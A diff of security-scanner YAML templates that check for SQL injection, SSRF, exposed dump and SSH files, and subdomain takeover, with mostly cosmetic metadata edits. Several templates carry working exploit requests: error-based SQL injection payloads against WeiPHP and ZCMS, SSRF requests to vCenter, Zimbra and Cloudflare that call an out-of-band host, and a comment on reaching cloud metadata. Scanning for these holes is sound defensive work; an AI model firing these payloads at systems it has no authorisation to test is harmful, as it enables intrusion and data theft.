b/poc/sql_injection/exposed-sqlite-manager-7350.yaml @@ -1,18 +1,15 @@ id: exposed-sqlite-manager - info: name: SQLiteManager author: dhiyaneshDK severity: medium reference: https://www.exploit-db.com/ghdb/5003 tags: sqlite - requests: - method: GET path: - '{{BaseURL}}/sqlite/' - '{{BaseURL}}/sqlitemanager/' - matchers-condition: and matchers: - type: word diff --git a/poc/sql_injection/sql-dump-10497.yaml b/poc/sql_injection/sql-dump-10497.yaml index 05e97713ac..0bf0d2bcb0 100644 --- a/poc/sql_injection/sql-dump-10497.yaml +++ b/poc/sql_injection/sql-dump-10497.yaml @@ -1,9 +1,11 @@ id: default-sql-dump + info: name: MySQL Dump Files - author: geeknik & @dwisiswant0 + author: geeknik,dwisiswant0 severity: medium - tags: exposure,backup + tags: exposure,backup,mysql + requests: - method: GET path: @@ -28,6 +30,7 @@ requests: - "{{BaseURL}}/wp-content/uploads/dump.sql" headers: Range: "bytes=0-3000" + max-size: 2000 # Size in bytes - Max Size to read from server response matchers-condition: and matchers: @@ -35,6 +38,7 @@ requests: regex: - "(?m)(?:DROP|CREATE|(?:UN)?LOCK) TABLE|INSERT INTO" part: body + - type: status status: - 200 diff --git a/poc/sql_injection/sqliheader.yaml b/poc/sql_injection/sqliheader.yaml index 832a9fc156..012bac2af3 100644 --- a/poc/sql_injection/sqliheader.yaml +++ b/poc/sql_injection/sqliheader.yaml @@ -1,8 +1,10 @@ id: header-sqli + info: name: Request header based sqli - author: panch0r3d + author: nithissh severity: high + requests: - method: GET path: diff --git a/poc/sql_injection/weiphp-sql-injection.yaml b/poc/sql_injection/weiphp-sql-injection.yaml index 8b0c9a5a1a..2b57dda7f7 100644 --- a/poc/sql_injection/weiphp-sql-injection.yaml +++ b/poc/sql_injection/weiphp-sql-injection.yaml @@ -1,24 +1,28 @@ id: weiphp-sql-injection + info: name: WeiPHP 5.0 SQLI author: pikpikcu severity: high - reference: - - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md - metadata: - verified: true - shodan-query: http.html:"WeiPHP5.0" + reference: https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md tags: weiphp,sql + requests: - method: POST path: - "{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ " + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: + - type: word - part: body words: - "52c69e3a57331081823331c4e69d3f2" + part: body + condition: and + - type: status status: - 500 diff --git a/poc/sql_injection/wuzhicms-sqli-11658.yaml b/poc/sql_injection/wuzhicms-sqli-11658.yaml index fbb326fda5..b972d9a3d9 100644 --- a/poc/sql_injection/wuzhicms-sqli-11658.yaml +++ b/poc/sql_injection/wuzhicms-sqli-11658.yaml @@ -5,6 +5,7 @@ info: severity: high reference: https://github.com/wuzhicms/wuzhicms/issues/184 tags: wuzhicms,sqli + requests: - method: GET path: diff --git a/poc/sql_injection/zcms-v3-sqli.yaml b/poc/sql_injection/zcms-v3-sqli.yaml index a7084a23d3..ed56b88314 100644 --- a/poc/sql_injection/zcms-v3-sqli.yaml +++ b/poc/sql_injection/zcms-v3-sqli.yaml @@ -6,18 +6,16 @@ info: reference: - https://www.anquanke.com/post/id/183241 tags: zcms,sqli -variables: - num: "999999999" requests: - method: GET path: - - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'" + - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'" matchers-condition: and matchers: - - type: word - words: - - '{{md5({{num}})}}' - part: body - type: status status: - 200 + - type: word + words: + - "6f7c6dcbc380aac3bcba1f9fccec991e" + part: body diff --git a/poc/ssh/circleci-ssh-config.yaml b/poc/ssh/circleci-ssh-config.yaml index 3c3d245991..0d19b816b8 100644 --- a/poc/ssh/circleci-ssh-config.yaml +++ b/poc/ssh/circleci-ssh-config.yaml @@ -4,7 +4,7 @@ info: name: circleci ssh-config exposure author: geeknik severity: low - tags: config,exposure + tags: config,exposure,circleci requests: - method: GET diff --git a/poc/ssh/ssh-known-hosts.yaml b/poc/ssh/ssh-known-hosts.yaml index ccdc97175e..100d60c2e3 100644 --- a/poc/ssh/ssh-known-hosts.yaml +++ b/poc/ssh/ssh-known-hosts.yaml @@ -1,18 +1,15 @@ id: ssh-known-hosts - info: name: SSH Known Hosts author: geeknik reference: https://datacadamia.com/ssh/known_hosts severity: low tags: config,exposure,ssh - requests: - method: GET path: - "{{BaseURL}}/.ssh/known_hosts" - "{{BaseURL}}/.ssh/known_hosts.old" - matchers-condition: and matchers: - type: word @@ -22,7 +19,6 @@ requests: - "ssh-rsa" - "ecdsa-sha2-nistp256" condition: or - - type: status status: - 200 diff --git a/poc/ssrf/cloudflare-image-ssrf.yaml b/poc/ssrf/cloudflare-image-ssrf.yaml index 53750448b2..2674cd7f60 100644 --- a/poc/ssrf/cloudflare-image-ssrf.yaml +++ b/poc/ssrf/cloudflare-image-ssrf.yaml @@ -6,17 +6,14 @@ info: severity: info description: Cloudflare Image Resizing defaults to restricting resizing to the same domain. This prevents third parties from resizing any image at any origin. However, you can enable this option if you check Resize images from any origin. reference: https://support.cloudflare.com/hc/en-us/articles/360028146432-Understanding-Cloudflare-Image-Resizing#12345684 - tags: cloudflare,misconfig,oob + tags: cloudflare,misconfig,oast requests: - raw: - | GET /cdn-cgi/image/width/https://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 - Connection: close Accept: */* - Accept-Language: en matchers: - type: word diff --git a/poc/ssrf/linkerd-ssrf-detect.yaml b/poc/ssrf/linkerd-ssrf-detect.yaml index ad99f869a7..16b0eb2d0f 100644 --- a/poc/ssrf/linkerd-ssrf-detect.yaml +++ b/poc/ssrf/linkerd-ssrf-detect.yaml @@ -1,5 +1,4 @@ id: linkerd-ssrf-detect - # Detect the Linkerd service by overriding the delegation table and # inspect the response for: # - a "Via: .. linkerd .." @@ -14,19 +13,16 @@ id: linkerd-ssrf-detect # # - "l5d-dtab: /svc/* => /$/inet/yourserver.com/80", to get to other external hosts # - "l5d-dtab: /svc/* => /$/inet/169.254.169.254/80", to get to cloud metadata - info: name: Linkerd SSRF detection author: dudez severity: info - requests: - method: GET path: - "{{BaseURL}}/" headers: l5d-dtab: /svc/* => /$/inet/example.com/443 - matchers-condition: or matchers: - type: regex @@ -34,31 +30,26 @@ requests: regex: - '(?mi)^Via\s*?:.*?linkerd.*$' part: header - - type: regex name: l5d-err-present regex: - '(?mi)^l5d-err:.*$' part: header - - type: regex name: l5d-success-class-present regex: - '(?mi)^l5d-success-class: 0.*$' part: header - - type: word name: ssrf-response-body words: - '

This domain is for use in illustrative examples in documents.' part: body - - type: regex name: resolve-timeout-error-present regex: - '(?mi)Exceeded .*? binding timeout while resolving name' part: body - - type: regex name: dynbind-error-present regex: diff --git a/poc/ssrf/microstrategy-ssrf-8861.yaml b/poc/ssrf/microstrategy-ssrf-8861.yaml index 1af06976e2..4d08720f94 100644 --- a/poc/ssrf/microstrategy-ssrf-8861.yaml +++ b/poc/ssrf/microstrategy-ssrf-8861.yaml @@ -4,8 +4,8 @@ info: author: organiccrap severity: high description: Blind server-side request forgery vulnerability on MicroStrategy URL shortener. - # reference: https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204 - + reference: https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204 + tags: microstrategy,ssrf requests: - method: GET path: diff --git a/poc/ssrf/ssrf-via-oauth-misconfig.yaml b/poc/ssrf/ssrf-via-oauth-misconfig.yaml index dcf32597cc..9fe1869a10 100644 --- a/poc/ssrf/ssrf-via-oauth-misconfig.yaml +++ b/poc/ssrf/ssrf-via-oauth-misconfig.yaml @@ -4,9 +4,8 @@ info: author: KabirSuda severity: medium description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters. - reference: - - https://portswigger.net/research/hidden-oauth-attack-vectors tags: misconfig,oast,oauth,ssrf + reference: https://portswigger.net/research/hidden-oauth-attack-vectors requests: - raw: - | diff --git a/poc/ssrf/vmware-vcenter-ssrf.yaml b/poc/ssrf/vmware-vcenter-ssrf.yaml index 4bd82a9b23..a842c409e1 100644 --- a/poc/ssrf/vmware-vcenter-ssrf.yaml +++ b/poc/ssrf/vmware-vcenter-ssrf.yaml @@ -1,24 +1,21 @@ id: vmware-vcenter-ssrf - info: name: VMware vCenter SSRF/LFI/XSS author: pdteam severity: critical - reference: https://github.com/l0ggg/VMware_vCenter + reference: + - https://github.com/l0ggg/VMware_vCenter tags: ssrf,lfi,xss,oast,vcenter,vmware - requests: - method: GET path: - "{{BaseURL}}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://{{interactsh-url}}" - matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - - type: status status: - 200 diff --git a/poc/ssrf/w3c-total-cache-ssrf-11077.yaml b/poc/ssrf/w3c-total-cache-ssrf-11077.yaml index ce589aee75..e85cc156ae 100644 --- a/poc/ssrf/w3c-total-cache-ssrf-11077.yaml +++ b/poc/ssrf/w3c-total-cache-ssrf-11077.yaml @@ -1,13 +1,14 @@ id: w3c-total-cache-ssrf info: name: Wordpress W3C Total Cache SSRF <= 0.9.4 - author: random-robbie + author: random_robbie severity: medium - tags: wordpress,wp-plugin + tags: wordpress,wp-plugin,cache,ssrf description: The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability. - reference: | + reference: - https://wpvulndb.com/vulnerabilities/8644 - https://klikki.fi/adv/w3_total_cache.html + requests: - method: GET path: diff --git a/poc/ssrf/w3c-total-cache-ssrf.yaml b/poc/ssrf/w3c-total-cache-ssrf.yaml index ba650020ae..dcb07f9d0e 100644 --- a/poc/ssrf/w3c-total-cache-ssrf.yaml +++ b/poc/ssrf/w3c-total-cache-ssrf.yaml @@ -4,9 +4,11 @@ info: author: random-robbie severity: medium tags: wordpress,wp-plugin + # Reference # https://wpvulndb.com/vulnerabilities/8644 # https://klikki.fi/adv/w3_total_cache.html + requests: - method: GET path: @@ -15,4 +17,4 @@ requests: - type: word words: - "NessusFileIncludeTest" - part: body + part: body \ No newline at end of file diff --git a/poc/ssrf/xmlrpc-pingback-ssrf-11689.yaml b/poc/ssrf/xmlrpc-pingback-ssrf-11689.yaml index 4d87c3fbeb..be57a6b501 100644 --- a/poc/ssrf/xmlrpc-pingback-ssrf-11689.yaml +++ b/poc/ssrf/xmlrpc-pingback-ssrf-11689.yaml @@ -2,21 +2,16 @@ id: xmlrpc-pingback-ssrf info: name: XMLRPC Pingback SSRF author: geeknik - reference: https://hackerone.com/reports/406387 severity: high + reference: + - https://hackerone.com/reports/406387 + tags: ssrf,generic,xmlrpc requests: - raw: - | POST /xmlrpc/pingback HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 - Accept-Encoding: gzip, deflate - Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; ANONYMOUS_USER_ID=2922001 - Connection: close - Upgrade-Insecure-Requests: 1 - Content-Length: 305 @@ -25,15 +20,10 @@ requests: http://{{interactsh-url}} - - https://{{Hostname}}/web/guest/home/ - - matchers-condition: and matchers: - type: word - part: interactsh-protocol + part: interactsh_protocol words: - - "dns" - "http" diff --git a/poc/ssrf/zimbra-preauth-ssrf-11810.yaml b/poc/ssrf/zimbra-preauth-ssrf-11810.yaml index 1fad6022fa..8f955e0f3f 100644 --- a/poc/ssrf/zimbra-preauth-ssrf-11810.yaml +++ b/poc/ssrf/zimbra-preauth-ssrf-11810.yaml @@ -1,34 +1,20 @@ id: zimbra-preauth-ssrf - info: - name: Zimbra Collaboration Suite - Server-Side Request Forgery + name: Zimbra Collaboration Suite (ZCS) - SSRF author: gy741 severity: critical - description: Zimbra Collaboration Suite (ZCS) allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code. + description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code. reference: - https://www.adminxe.com/2183.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-7796 - - https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-7796 - cwe-id: CWE-918 tags: zimbra,ssrf,oast - metadata: - max-request: 1 - -http: +requests: - raw: - | GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1 Host: {{Hostname}} Accept: */* - matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# Enhanced by mp on 2022/06/03 diff --git a/poc/subdomain_takeover/acquia-takeover-35.yaml b/poc/subdomain_takeover/acquia-takeover-35.yaml index fa267bacc3..3740c22e91 100644 --- a/poc/subdomain_takeover/acquia-takeover-35.yaml +++ b/poc/subdomain_takeover/acquia-takeover-35.yaml @@ -2,7 +2,7 @@ id: acquia-takeover info: name: Acquia Takeover Detection - author: pdcommunity + author: pdteam severity: info tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz diff --git a/poc/subdomain_takeover/aftership-takeover.yaml b/poc/subdomain_takeover/aftership-takeover.yaml index cda98eeb27..9407e028c7 100644 --- a/poc/subdomain_takeover/aftership-takeover.yaml +++ b/poc/subdomain_takeover/aftership-takeover.yaml @@ -3,9 +3,8 @@ info: name: Aftership Takeover Detection author: pdteam severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: diff --git a/poc/subdomain_takeover/agilecrm-takeover-211.yaml b/poc/subdomain_takeover/agilecrm-takeover-211.yaml index 03cb27aec2..9639c4a23f 100644 --- a/poc/subdomain_takeover/agilecrm-takeover-211.yaml +++ b/poc/subdomain_takeover/agilecrm-takeover-211.yaml @@ -1,10 +1,11 @@ id: agilecrm-takeover info: name: agilecrm takeover detection - author: pdcommunity + author: pdteam severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: diff --git a/poc/subdomain_takeover/aha-takeover-214.yaml b/poc/subdomain_takeover/aha-takeover-214.yaml index 2cd6bcb83d..649b36b6e5 100644 --- a/poc/subdomain_takeover/aha-takeover-214.yaml +++ b/poc/subdomain_takeover/aha-takeover-214.yaml @@ -1,18 +1,15 @@ id: aha-takeover - info: name: Aha Takeover Detection - author: pdteam + author: pdcommunity severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz - requests: - method: GET path: - "{{BaseURL}}" - matchers: - type: word words: - - There is no portal here ... sending you back to Aha! \ No newline at end of file + - There is no portal here ... sending you back to Aha! diff --git a/poc/subdomain_takeover/announcekit-takeover-321.yaml b/poc/subdomain_takeover/announcekit-takeover-321.yaml index 9326076abe..340dd72666 100644 --- a/poc/subdomain_takeover/announcekit-takeover-321.yaml +++ b/poc/subdomain_takeover/announcekit-takeover-321.yaml @@ -1,28 +1,31 @@ -id: announcekit-takeover -info: - name: Announcekit Takeover Detection - author: melbadry9 - severity: high - tags: takeover,announcekit - reference: - - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit - - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228 -requests: - - method: GET - raw: - - |2 - GET / HTTP/1.1 - - Host: {{Hostname}} - - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - redirects: true - max-redirects: 1 - matchers-condition: and - matchers: - - type: word - words: - - 'Error 404 - AnnounceKit' - - type: status - status: - - 404 +id: announcekit-takeover + +info: + name: Announcekit Takeover Detection + author: melbadry9 + severity: high + tags: takeover,announcekit + reference: + - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228 + +requests: + - method: GET + raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + + redirects: true + max-redirects: 1 + + matchers-condition: and + matchers: + - type: word + words: + - 'Error 404 - AnnounceKit' + + - type: status + status: + - 404 diff --git a/poc/subdomain_takeover/bitbucket-takeover-740.yaml b/poc/subdomain_takeover/bitbucket-takeover-740.yaml index f9234ad7a3..2987941c14 100644 --- a/poc/subdomain_takeover/bitbucket-takeover-740.yaml +++ b/poc/subdomain_takeover/bitbucket-takeover-740.yaml @@ -1,25 +1,21 @@ id: bitbucket-takeover - info: name: Bitbucket Takeover Detection author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz - requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word words: - "Repository not found" part: body - - type: word words: - "text/plain" - part: header \ No newline at end of file + part: header diff --git a/poc/subdomain_takeover/brightcove-takeover.yaml b/poc/subdomain_takeover/brightcove-takeover.yaml index 31f1fae0cd..3c169edae2 100644 --- a/poc/subdomain_takeover/brightcove-takeover.yaml +++ b/poc/subdomain_takeover/brightcove-takeover.yaml @@ -1,10 +1,11 @@ id: brightcove-takeover info: name: brightcove takeover detection - author: pdcommunity + author: pdteam severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: diff --git a/poc/subdomain_takeover/cargo-takeover-866.yaml b/poc/subdomain_takeover/cargo-takeover-866.yaml index bd7f124269..f429fe1679 100644 --- a/poc/subdomain_takeover/cargo-takeover-866.yaml +++ b/poc/subdomain_takeover/cargo-takeover-866.yaml @@ -1,15 +1,18 @@ id: cargo-takeover + info: name: cargo takeover detection author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - - "If you're moving your domain away from Cargo you must make this configuration through your registrar's DNS control panel." + - "If you're moving your domain away from Cargo you must make this configuration through your registrar's DNS control panel." \ No newline at end of file diff --git a/poc/subdomain_takeover/feedpress-takeover-7458.yaml b/poc/subdomain_takeover/feedpress-takeover-7458.yaml index f2819bdef7..ddd26565e1 100644 --- a/poc/subdomain_takeover/feedpress-takeover-7458.yaml +++ b/poc/subdomain_takeover/feedpress-takeover-7458.yaml @@ -1,11 +1,10 @@ id: feedpress-takeover info: name: Agilecrm Takeover Detection - author: pdteam + author: pdcommunity severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: diff --git a/poc/subdomain_takeover/flywheel-takeover.yaml b/poc/subdomain_takeover/flywheel-takeover.yaml index 5cd4e2de15..48e5459959 100644 --- a/poc/subdomain_takeover/flywheel-takeover.yaml +++ b/poc/subdomain_takeover/flywheel-takeover.yaml @@ -1,10 +1,12 @@ id: flywheel-takeover + info: name: Flywheel Subdomain Takeover author: smaranchand severity: high tags: takeover reference: https://smaranchand.com.np/2021/06/flywheel-subdomain-takeover + requests: - method: GET path: diff --git a/poc/subdomain_takeover/ghost-takeover-7622.yaml b/poc/subdomain_takeover/ghost-takeover-7622.yaml index 6f529c2709..453169d21f 100644 --- a/poc/subdomain_takeover/ghost-takeover-7622.yaml +++ b/poc/subdomain_takeover/ghost-takeover-7622.yaml @@ -1,19 +1,21 @@ id: ghost-takeover - info: name: ghost takeover detection author: pdteam severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz - + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/89 + tags: takeover,ghost requests: - method: GET path: - "{{BaseURL}}" - + matchers-condition: and matchers: - type: word + part: header words: - - The thing you were looking for is no longer here - - The thing you were looking for is no longer here, or never was \ No newline at end of file + - 'offline.ghost.org' + - type: status + status: + - 302 diff --git a/poc/subdomain_takeover/helpjuice-takeover.yaml b/poc/subdomain_takeover/helpjuice-takeover.yaml index c5ab27ce89..77a0d626fd 100644 --- a/poc/subdomain_takeover/helpjuice-takeover.yaml +++ b/poc/subdomain_takeover/helpjuice-takeover.yaml @@ -1,18 +1,15 @@ id: helpjuice-takeover - info: name: helpjuice takeover detection author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz - requests: - method: GET path: - "{{BaseURL}}" - matchers: - type: word words: - - We could not find what you're looking for. \ No newline at end of file + - We could not find what you're looking for. diff --git a/poc/subdomain_takeover/helpscout-takeover-7934.yaml b/poc/subdomain_takeover/helpscout-takeover-7934.yaml index 899cf00fe0..548f39f325 100644 --- a/poc/subdomain_takeover/helpscout-takeover-7934.yaml +++ b/poc/subdomain_takeover/helpscout-takeover-7934.yaml @@ -1,16 +1,19 @@ id: helpscout-takeover + info: name: helpscout takeover detection author: pdteam severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: + - type: word words: - - "No settings were found for this company:" + - "No settings were found for this company:" \ No newline at end of file diff --git a/poc/subdomain_takeover/jazzhr-takeover-8235.yaml b/poc/subdomain_takeover/jazzhr-takeover-8235.yaml index d8f20df0d2..cc2e8d6a32 100644 --- a/poc/subdomain_takeover/jazzhr-takeover-8235.yaml +++ b/poc/subdomain_takeover/jazzhr-takeover-8235.yaml @@ -1,15 +1,18 @@ id: jazzhr-takeover + info: name: jazzhr takeover detection - author: pdcommunity + author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - - This account no longer active + - This account no longer active \ No newline at end of file diff --git a/poc/subdomain_takeover/landingi-takeover-8566.yaml b/poc/subdomain_takeover/landingi-takeover-8566.yaml index 71ebf119b4..918c30fb6a 100644 --- a/poc/subdomain_takeover/landingi-takeover-8566.yaml +++ b/poc/subdomain_takeover/landingi-takeover-8566.yaml @@ -1,7 +1,7 @@ id: landingi-takeover info: name: landingi takeover detection - author: pdteam + author: pdcommunity severity: info tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/117 diff --git a/poc/subdomain_takeover/launchrock-takeover-8603.yaml b/poc/subdomain_takeover/launchrock-takeover-8603.yaml index 0dfea4d37b..b81478b063 100644 --- a/poc/subdomain_takeover/launchrock-takeover-8603.yaml +++ b/poc/subdomain_takeover/launchrock-takeover-8603.yaml @@ -1,15 +1,18 @@ id: launchrock-takeover + info: name: launchrock takeover detection author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens to all of us. + - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens to all of us. \ No newline at end of file diff --git a/poc/subdomain_takeover/netlify-takeover-9042.yaml b/poc/subdomain_takeover/netlify-takeover-9042.yaml index 17ceeb0180..973635bbcd 100644 --- a/poc/subdomain_takeover/netlify-takeover-9042.yaml +++ b/poc/subdomain_takeover/netlify-takeover-9042.yaml @@ -1,11 +1,10 @@ id: netlify-takeover info: name: netlify takeover detection - author: 0xPrial,pdteam + author: pdcommunity severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover,netlify + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: @@ -14,8 +13,8 @@ requests: matchers: - type: word words: - - "Not found - Request ID:" + - "Not Found" - type: word words: - - "Netlify" + - "server: Netlify" part: header diff --git a/poc/subdomain_takeover/pantheon-takeover-9461.yaml b/poc/subdomain_takeover/pantheon-takeover-9461.yaml index 2f9438c074..a029691e60 100644 --- a/poc/subdomain_takeover/pantheon-takeover-9461.yaml +++ b/poc/subdomain_takeover/pantheon-takeover-9461.yaml @@ -1,18 +1,15 @@ id: pantheon-takeover - info: name: pantheon takeover detection - author: pdteam + author: pdcommunity severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz - requests: - method: GET path: - "{{BaseURL}}" - matchers: - type: word words: - - "The gods are wise, but do not know of the site which you seek." \ No newline at end of file + - "The gods are wise, but do not know of the site which you seek." diff --git a/poc/subdomain_takeover/pingdom-takeover-9587.yaml b/poc/subdomain_takeover/pingdom-takeover-9587.yaml index cc6932ebff..fcc211e1b0 100644 --- a/poc/subdomain_takeover/pingdom-takeover-9587.yaml +++ b/poc/subdomain_takeover/pingdom-takeover-9587.yaml @@ -1,17 +1,19 @@ id: pingdom-takeover + info: name: pingdom takeover detection author: pdteam severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - Public Report Not Activated - - This public report page has not been activated by the user + - This public report page has not been activated by the user \ No newline at end of file diff --git a/poc/subdomain_takeover/proposify-takeover-9693.yaml b/poc/subdomain_takeover/proposify-takeover-9693.yaml index 72fcf7d484..2312d7cb42 100644 --- a/poc/subdomain_takeover/proposify-takeover-9693.yaml +++ b/poc/subdomain_takeover/proposify-takeover-9693.yaml @@ -1,11 +1,10 @@ id: proposify-takeover info: name: proposify takeover detection - author: pdteam + author: pdcommunity severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: diff --git a/poc/subdomain_takeover/readme-takeover-9842.yaml b/poc/subdomain_takeover/readme-takeover-9842.yaml index f105be275a..942af6ab47 100644 --- a/poc/subdomain_takeover/readme-takeover-9842.yaml +++ b/poc/subdomain_takeover/readme-takeover-9842.yaml @@ -1,15 +1,18 @@ id: readme-takeover + info: name: readme takeover detection - author: pdcommunity + author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - - Project doesnt exist... yet! + - 'Project doesnt exist... yet!' diff --git a/poc/subdomain_takeover/s3-subtakeover.yaml b/poc/subdomain_takeover/s3-subtakeover.yaml index 9b5790b840..6ada628d08 100644 --- a/poc/subdomain_takeover/s3-subtakeover.yaml +++ b/poc/subdomain_takeover/s3-subtakeover.yaml @@ -1,9 +1,13 @@ id: s3-subtakeover + info: name: Subdomain takeovee AWS S3 author: manikanta a.k.a @secureitmania severity: high + # Source:- https://link.medium.com/fgXKJHR9P7 + + requests: - method: GET path: diff --git a/poc/subdomain_takeover/shopify-takeover-10204.yaml b/poc/subdomain_takeover/shopify-takeover-10204.yaml index e3cd175309..e657c6388f 100644 --- a/poc/subdomain_takeover/shopify-takeover-10204.yaml +++ b/poc/subdomain_takeover/shopify-takeover-10204.yaml @@ -1,7 +1,7 @@ id: shopify-takeover info: name: shopify takeover detection - author: pdcommunity + author: pdteam,philippedelteil severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz @@ -9,8 +9,18 @@ requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - - "Sorry, this shop is currently unavailable." - 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"' + - "Sorry, this shop is currently unavailable." + condition: or + - type: word + words: + - 'shop-not-found' + - type: dsl + dsl: + - '!contains(host,"myshopify.com")' + - '!contains(host,"shopify.com")' + condition: and diff --git a/poc/subdomain_takeover/tave-takeover-10661.yaml b/poc/subdomain_takeover/tave-takeover-10661.yaml index 8f17507fe9..856340b2cf 100644 --- a/poc/subdomain_takeover/tave-takeover-10661.yaml +++ b/poc/subdomain_takeover/tave-takeover-10661.yaml @@ -1,15 +1,18 @@ id: tave-takeover + info: name: tave takeover detection - author: pdcommunity + author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - - "

Error 404: Page Not Found

" + - "

Error 404: Page Not Found

